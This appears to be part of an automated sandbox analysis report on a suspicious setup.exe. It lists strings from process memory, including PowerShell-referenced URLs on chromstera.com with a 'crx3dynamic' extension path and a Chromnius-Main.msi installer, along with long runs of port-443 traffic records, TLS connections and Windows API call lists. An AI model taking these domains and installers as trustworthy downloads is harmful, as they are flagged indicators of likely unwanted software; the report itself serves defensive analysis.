                      Source: powershell.exe, 00000006.00000002.1826666135.0000025210075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1826666135.00000252101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1922851954.00000248902B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1922851954.00000248903F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2048653111.000001BA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA2C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.c
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmp, setup.exe, Chromnius-Main.msi.0.drString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4&time=
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4&time=1730139128
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000002.2952383643.0000000005110000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000002.2949076148.00000000013CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.com
                      Source: setup.exe, Chromnius-Main.msi.0.drString found in binary or memory: https://www.chromstera.com/installer/
                      Source: setup.exe, Chromnius-Main.msi.0.drString found in binary or memory: https://www.chromstera.comARPSYSTEMCOMPONENTARPURLINFOABOUTARPURLUPDATEINFOExtractFilesFirstWindowsT
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comM
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comT
                      Source: setup.exe, 00000000.00000003.1719741857.0000000003CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comY
                      Source: setup.exe, 00000000.00000003.2315731246.00000000062E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.combmp
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comh
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.commu
                      Source: setup.exe, 00000000.00000003.2315731246.00000000062E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.compl
                      Source: setup.exe, 00000000.00000002.2952714019.000000000628A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comrT/
                      Source: setup.exe, 00000000.00000002.2952714019.000000000628A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comz
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59227 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59158
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59279
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59157
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59278
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59159
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59275
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59274
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59277
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59155
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59276
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59271
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59270
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59152
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59210 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59273
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59272
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59239 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59159 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59285 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59289
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59286
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59285
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59288
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59287
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59161
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59282
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59160
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59281
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59163
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59284
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59274 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59283
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59160 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59183 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59209 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59240 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59179
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59297
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59296
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59299
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59177
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59298
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59293
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59296 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59292
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59295
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59273 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59294
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59291
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59290
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59302 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59262 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59194 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59186
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59189
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59188
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59183
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59185
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59184
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59251 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59217 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59181 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59228
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59227
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59229
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59235
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59234
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59237
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59236
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59231
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59275 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59230
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59233
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59298 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59252 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59264 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59300 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59239
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59238
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59208 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59246
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59229 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59245
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59248
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59247
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59192 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59242
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59241
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59244
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59243
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59240
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59286 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59158 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59301 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59263 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59249
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59257
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59256
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59259
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59258
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59253
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59252
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59193 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59255
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59250
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59241 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59268
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59230 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59267
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59312 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59269
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59264
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59263
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59266
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59265
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59297 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59260
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59262
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59261
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59179 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59294 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59191 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59271 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59304 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59247 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59260 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59236 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59248 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59282 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59225 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59212 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59293 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59157 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59259 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59303 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59284 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59261 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59189 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59200 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59198
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59197
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59166 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59199
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59194
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59196
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59195
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59237 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59192
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59191
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59155 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59295 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59226 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59211 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59250 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59178 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59283 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59249 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59272 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59238 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59204 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59256 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59279 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59176 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59199 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59233 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59291 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59268 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59222 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59280 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59307 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59215 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59267 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59154 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.8.139:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:59273 version: TLS 1.2
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00CAA220 SendMessageW,GetParent,GetParent,GetWindowRect,GetParent,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,MapWindowPoints,FillRect,DeleteDC,SendMessageW,SendMessageW,SendMessageW
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00C889F0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BC00C0 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BB9360 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BC9430 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BB6670 SysFreeString,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,NtdllDefWindowProc_W,SysFreeString
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00C177A0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00C689B0 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BB9920 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BB6CD0 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BB8C40 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BC3E40 KillTimer,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BD6FE0 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BB5F50 GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,GetWindowTextLengthW,GetWindowTextW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BBFF50 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00C889F0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BB60E5 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BC00C0 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BB9360 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BC9430 NtdllDefWindowProc_W
